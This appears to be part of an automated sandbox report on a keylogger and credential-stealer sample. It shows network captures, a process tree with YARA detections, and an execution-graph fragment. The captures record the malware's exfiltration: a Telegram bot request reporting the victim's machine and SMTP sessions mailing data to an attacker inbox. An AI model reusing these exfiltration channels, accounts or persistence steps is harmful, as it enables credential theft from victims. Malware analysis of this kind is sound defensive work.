                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kJ9o4fNWfPIkluNwBfcQWnh9W%2BdaMfSth2Wl%2F8h6YDObriwyQY3cMga%2FQCXGirQuciLzfZO1WgSKFMz0FSCIVEdyBeZbHSM994xTtWzJJFsTBvx5O3K6I7%2F2xCOXXN9L8kWpfqCx"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aafb58c08c0b-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:28 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  16 | 192.168.2.7 | 49734 | 188.114.96.3 | 443 | 6480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:30 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:31 UTC | 714 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:31 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78342
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BuDGESx0ndL8b1x%2F8C3Tlh4SHqJg5Zc5%2BquK%2BKUwgO7lASjKnlU3tC8vc1oenJ7W%2FTiZRavHxhHKRtfFbFXJ%2FCWtppnWXhPaMzbLRKn%2BqGcfqWXujvrGEYaqcM9Wpi4aKtuWGdNm"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51ab0c09691978-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:31 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  17 | 192.168.2.7 | 49736 | 188.114.96.3 | 443 | 6480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:32 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:32 UTC | 708 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:32 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78343
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bttsZdslEQbj6yZausgr0mYanMlrmegdMJwKFJkhomfoTLhJR8vtiPkLG1TWyaOWhUpDD28tN0B5%2BcLbv1VSyopW%2BI3DQgm6Y7kAomavlGCnb9DSWrJgAxf4VWCMRCzlghY62%2BJ%2F"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51ab14e93817f1-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:32 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  18 | 192.168.2.7 | 49738 | 188.114.96.3 | 443 | 6480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:34 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:35 UTC | 706 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:35 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78346
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qGAwaMSCpN0oThg6%2F45MFKNR4dwA2D3q7X0xlreaWXZ9knGSlGs05GW6tHEtuuT9%2BvuyGG8B77sZT8CHHoDQ5dHMEZSpFD%2FYLWZ8mCOC4twZOZsr4aTYvoEGQzZsSrjMGEqDgyyX"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51ab24b86d42fe-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:35 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  19 | 192.168.2.7 | 49739 | 149.154.167.220 | 443 | 6480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:35 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2004:52:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                  Host: api.telegram.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:35 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx/1.18.0
                                                  Date: Wed, 18 Sep 2024 13:26:35 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 55
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-18 13:26:35 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                  Sep 18, 2024 15:26:31.248635054 CEST | 587 | 49732 | 208.91.198.143 | 192.168.2.7 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                  Sep 18, 2024 15:26:31.248863935 CEST | 49732 | 587 | 192.168.2.7 | 208.91.198.143 | EHLO 675052
                                                  Sep 18, 2024 15:26:31.403965950 CEST | 587 | 49732 | 208.91.198.143 | 192.168.2.7 | 250-us2.outbound.mailhostbox.com
                                                  250-PIPELINING
                                                  250-SIZE 41648128
                                                  250-VRFY
                                                  250-ETRN
                                                  250-STARTTLS
                                                  250-AUTH PLAIN LOGIN
                                                  250-AUTH=PLAIN LOGIN
                                                  250-ENHANCEDSTATUSCODES
                                                  250-8BITMIME
                                                  250-DSN
                                                  250 CHUNKING
                                                  Sep 18, 2024 15:26:31.409096956 CEST | 49732 | 587 | 192.168.2.7 | 208.91.198.143 | AUTH login d2V0aGVtQGFrbGFuZWFoLXNhLmNvbQ==
                                                  Sep 18, 2024 15:26:31.579674959 CEST | 587 | 49732 | 208.91.198.143 | 192.168.2.7 | 334 UGFzc3dvcmQ6
                                                  Sep 18, 2024 15:26:31.740420103 CEST | 587 | 49732 | 208.91.198.143 | 192.168.2.7 | 235 2.7.0 Authentication successful
                                                  Sep 18, 2024 15:26:31.740645885 CEST | 49732 | 587 | 192.168.2.7 | 208.91.198.143 | MAIL FROM:<wethem@aklaneah-sa.com>
                                                  Sep 18, 2024 15:26:31.896560907 CEST | 587 | 49732 | 208.91.198.143 | 192.168.2.7 | 250 2.1.0 Ok
                                                  Sep 18, 2024 15:26:31.896810055 CEST | 49732 | 587 | 192.168.2.7 | 208.91.198.143 | RCPT TO:<resultlog62@gmail.com>
                                                  Sep 18, 2024 15:26:32.392853975 CEST | 587 | 49732 | 208.91.198.143 | 192.168.2.7 | 250 2.1.5 Ok
                                                  Sep 18, 2024 15:26:32.393096924 CEST | 49732 | 587 | 192.168.2.7 | 208.91.198.143 | DATA
                                                  Sep 18, 2024 15:26:32.394371986 CEST | 587 | 49732 | 208.91.198.143 | 192.168.2.7 | 250 2.1.5 Ok
                                                  Sep 18, 2024 15:26:32.549065113 CEST | 587 | 49732 | 208.91.198.143 | 192.168.2.7 | 354 End data with <CR><LF>.<CR><LF>
                                                  Sep 18, 2024 15:26:32.550303936 CEST | 49732 | 587 | 192.168.2.7 | 208.91.198.143 | .
                                                  Sep 18, 2024 15:26:32.937063932 CEST | 587 | 49732 | 208.91.198.143 | 192.168.2.7 | 250 2.0.0 Ok: queued as 00F5AB808A3
                                                  Sep 18, 2024 15:26:42.476718903 CEST | 587 | 49740 | 208.91.198.143 | 192.168.2.7 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                  Sep 18, 2024 15:26:42.476996899 CEST | 49740 | 587 | 192.168.2.7 | 208.91.198.143 | EHLO 675052
                                                  Sep 18, 2024 15:26:42.632097960 CEST | 587 | 49740 | 208.91.198.143 | 192.168.2.7 | 250-us2.outbound.mailhostbox.com
                                                  250-PIPELINING
                                                  250-SIZE 41648128
                                                  250-VRFY
                                                  250-ETRN
                                                  250-STARTTLS
                                                  250-AUTH PLAIN LOGIN
                                                  250-AUTH=PLAIN LOGIN
                                                  250-ENHANCEDSTATUSCODES
                                                  250-8BITMIME
                                                  250-DSN
                                                  250 CHUNKING
                                                  Sep 18, 2024 15:26:42.632476091 CEST | 49740 | 587 | 192.168.2.7 | 208.91.198.143 | AUTH login d2V0aGVtQGFrbGFuZWFoLXNhLmNvbQ==
                                                  Sep 18, 2024 15:26:42.792351007 CEST | 587 | 49740 | 208.91.198.143 | 192.168.2.7 | 334 UGFzc3dvcmQ6
                                                  Sep 18, 2024 15:26:43.024652958 CEST | 587 | 49740 | 208.91.198.143 | 192.168.2.7 | 235 2.7.0 Authentication successful
                                                  Sep 18, 2024 15:26:43.024918079 CEST | 49740 | 587 | 192.168.2.7 | 208.91.198.143 | MAIL FROM:<wethem@aklaneah-sa.com>
                                                  Sep 18, 2024 15:26:43.181026936 CEST | 587 | 49740 | 208.91.198.143 | 192.168.2.7 | 250 2.1.0 Ok
                                                  Sep 18, 2024 15:26:43.181200981 CEST | 49740 | 587 | 192.168.2.7 | 208.91.198.143 | RCPT TO:<resultlog62@gmail.com>
                                                  Sep 18, 2024 15:26:43.360907078 CEST | 587 | 49740 | 208.91.198.143 | 192.168.2.7 | 250 2.1.5 Ok
                                                  Sep 18, 2024 15:26:43.361311913 CEST | 49740 | 587 | 192.168.2.7 | 208.91.198.143 | DATA
                                                  Sep 18, 2024 15:26:43.692055941 CEST | 587 | 49740 | 208.91.198.143 | 192.168.2.7 | 354 End data with <CR><LF>.<CR><LF>
                                                  Sep 18, 2024 15:26:43.693985939 CEST | 49740 | 587 | 192.168.2.7 | 208.91.198.143 | .
                                                  Sep 18, 2024 15:26:44.086220980 CEST | 587 | 49740 | 208.91.198.143 | 192.168.2.7 | 250 2.0.0 Ok: queued as 464E4B8040A
                                                  Sep 18, 2024 15:28:08.176207066 CEST | 49732 | 587 | 192.168.2.7 | 208.91.198.143 | QUIT
                                                  Sep 18, 2024 15:28:08.331727028 CEST | 587 | 49732 | 208.91.198.143 | 192.168.2.7 | 221 2.0.0 Bye
                                                  Sep 18, 2024 15:28:21.316992998 CEST | 49740 | 587 | 192.168.2.7 | 208.91.198.143 | QUIT
                                                  Sep 18, 2024 15:28:21.474251986 CEST | 587 | 49740 | 208.91.198.143 | 192.168.2.7 | 221 2.0.0 Bye


                                                  Target ID:0
                                                  Start time:09:25:58
                                                  Start date:18/09/2024
                                                  Path:C:\Users\user\Desktop\z1newpo.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\z1newpo.exe"
                                                  Imagebase:0x400000
                                                  File size:1'342'755 bytes
                                                  MD5 hash:C087116B5A47A54E5DD272162FD87B3B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:09:25:59
                                                  Start date:18/09/2024
                                                  Path:C:\Users\user\AppData\Local\directory\name.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\z1newpo.exe"
                                                  Imagebase:0x400000
                                                  File size:1'342'755 bytes
                                                  MD5 hash:C087116B5A47A54E5DD272162FD87B3B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 74%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:09:25:59
                                                  Start date:18/09/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\z1newpo.exe"
                                                  Imagebase:0x2a0000
                                                  File size:45'984 bytes
                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.3688609885.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3684808762.00000000003AD000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:11
                                                  Start time:09:26:12
                                                  Start date:18/09/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                                                  Imagebase:0x7ff6213c0000
                                                  File size:170'496 bytes
                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:09:26:12
                                                  Start date:18/09/2024
                                                  Path:C:\Users\user\AppData\Local\directory\name.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                  Imagebase:0x400000
                                                  File size:1'342'755 bytes
                                                  MD5 hash:C087116B5A47A54E5DD272162FD87B3B
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:09:26:13
                                                  Start date:18/09/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                  Imagebase:0x260000
                                                  File size:45'984 bytes
                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000D.00000002.3689181352.0000000002823000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false


                                                    Execution Graph

                                                    Execution Coverage:3.1%
                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                    Signature Coverage:8.8%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:36
87059 417f25 10 API calls _W_expandtime 87053->87059 87055 414e18 87056 414de6 87055->87056 87061 418f98 77 API calls 6 library calls 87055->87061 87056->87000 87058->87053 87059->87056 87060->87055 87061->87056 87065 414910 _doexit 87062->87065 87063 414923 87118 417f77 46 API calls __getptd_noexit 87063->87118 87065->87063 87067 414951 87065->87067 87066 414928 87119 417f25 10 API calls _W_expandtime 87066->87119 87081 41d4d1 87067->87081 87070 414956 87071 41496a 87070->87071 87072 41495d 87070->87072 87073 414992 87071->87073 87074 414972 87071->87074 87120 417f77 46 API calls __getptd_noexit 87072->87120 87098 41d218 87073->87098 87121 417f77 46 API calls __getptd_noexit 87074->87121 87078 414933 _doexit @_EH4_CallFilterFunc@8 87078->87005 87082 41d4dd _doexit 87081->87082 87083 4182cb __lock 46 API calls 87082->87083 87096 41d4eb 87083->87096 87084 41d560 87123 41d5fb 87084->87123 87085 41d567 87086 416b04 __malloc_crt 46 API calls 87085->87086 87089 41d56e 87086->87089 87088 41d5f0 _doexit 87088->87070 87089->87084 87090 41d57c InitializeCriticalSectionAndSpinCount 87089->87090 87091 41d59c 87090->87091 87092 41d5af EnterCriticalSection 87090->87092 87095 413748 _free 46 API calls 87091->87095 87092->87084 87093 418209 __mtinitlocknum 46 API calls 87093->87096 87095->87084 87096->87084 87096->87085 87096->87093 87126 4154b2 47 API calls __lock 87096->87126 87127 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87096->87127 87099 41d23a 87098->87099 87100 41d255 87099->87100 87112 41d26c __wopenfile 87099->87112 87132 417f77 46 API calls __getptd_noexit 87100->87132 87101 41d421 87105 41d47a 87101->87105 87106 41d48c 87101->87106 87103 41d25a 87133 417f25 10 API calls _W_expandtime 87103->87133 87137 417f77 46 API calls __getptd_noexit 87105->87137 87129 422bf9 87106->87129 87109 41d47f 87138 417f25 10 API calls _W_expandtime 87109->87138 87110 41499d 87122 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87110->87122 87112->87101 87112->87105 
